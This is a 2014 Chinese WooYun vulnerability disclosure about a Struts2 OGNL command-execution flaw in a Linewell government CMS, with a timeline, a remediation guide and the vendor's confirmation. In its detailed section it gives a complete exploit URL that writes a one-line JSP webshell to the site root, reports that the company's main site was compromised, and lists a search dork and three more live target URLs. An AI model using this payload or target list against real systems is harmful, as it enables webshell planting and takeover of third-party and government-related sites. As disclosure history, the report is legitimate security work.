当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060733

漏洞标题:某通用型cms系统存在命令执行漏洞

相关厂商:www.linewell.com

漏洞作者: 伟哥

提交时间:2014-05-20 12:14

修复时间:2014-07-04 12:15

公开时间:2014-07-04 12:15

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-20: 细节已通知厂商并且等待厂商处理中
2014-05-25: 厂商已经确认,细节仅向厂商公开
2014-06-04: 细节向核心白帽子及相关领域专家公开
2014-06-14: 细节向普通白帽子公开
2014-06-24: 细节向实习白帽子公开
2014-07-04: 细节向公众公开

简要描述:

南威软件股份有限公司成立于2002年,公司是国内电子政务领域的信息化综合服务提供商,主要从事电子政务的软件开发、系统集成及技术服务,并以解决方案的方式向政务部门提供上述全部或部分业务。
主营业务:公司主要以解决方案的方式向客户提供软件产品、系统集成和技术服务,建立满足客户工作需求的应用系统。公司的主营业务划分为三类:1、电子政务主要应用系统,主要包括权力阳光产品、党(军)委信息化产品; 2、社会管理与公共服务系统,主要包括智慧公安、平安城市等信息系统;3、行业应用支撑系统,主要包括云平台、整合平台、移动APP平台等。
公司自2004年起至今被认定为高新技术企业;2009年起至今被认定为国家火炬计划重点高新技术企业;2010年被国家发改委等四部委评定为“国家规划布局内重点软件企业”。
  公司拥有计算机信息系统集成壹级资质、涉及国家秘密的计算机信息系统集成甲级资质、涉及国家秘密的计算机信息系统集成单项(软件开发)资质、安防工程企业壹级资质、建筑智能化工程设计与施工贰级资质、通过了CMMI3认证,是行业内取得资质和认证种类齐全、等级较高的企业。
看到公司有 人才招聘的广告 有点心动貌似待遇还不错
于是就有了 这次安全检测 ←_←

详细说明:

看到公司有 人才招聘的广告 有点心动貌似待遇还不错
于是就有了 这次安全检测 ←_←
使用的应该是struts2的框架所以直接构造攻击代码
那么这里就拿官网做测试
http://www.linewell.com/cms/admin/login.action?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22webshell.jsp%22).replaceAll("\\\\","/"),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22content%22)).close()}&content=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
成功写入shell名称webshell.jsp
其中,webshell.jsp表示我们保存在根目录下的文件名称,content表示我们提交的字段名称及写入文件的内容信息。写入的内容为一句话JSP的木马

114217-52fff5239fc886911fe00dc6b6b532d8.jpg


主站沦陷!

51020-d2a93989df122dde3a479257b2c07547.jpg


关键字:
inurl:admin/login.action 南威
http://www.syga.com.cn/cms/admin/login.action
http://www.linewell.com/cms/admin/login.action
http://qzfznews.net/cms/admin/login.action
其他cms产品应该封装了struts2 应该也存在此漏洞
另:求小礼物

漏洞证明:

114217-52fff5239fc886911fe00dc6b6b532d8.jpg


修复方案:

1、删除工程的WEB-INF\lib目录下的commons-lang3-3.1.jar、javassist-3.4.GA.jar、ognl- 3.0.5.jar、struts2-core-2.3.4.1.jar、xwork-core-2.3.4.1.jar(如果找不到完全对应的jar文件,请删除版本号较低的),然后复制lib文件夹中的jar文件到工程的WEB-INF\lib目录下。
2、修改web.xml文件中的Struts2过滤器配置如下:
<filter>
<filter-name>struts2</filter-name>
<filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
</filter>
3、重启服务。
如果想知道详细信息请在乌云私密我

版权声明:转载请注明来源 伟哥@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-25 09:02

厂商回复:

cnvd确认并复现所述情况,已经转由cncert下发给江苏发中心处置。按通用衍生漏 洞进行评分,rank 12

最新状态:

暂无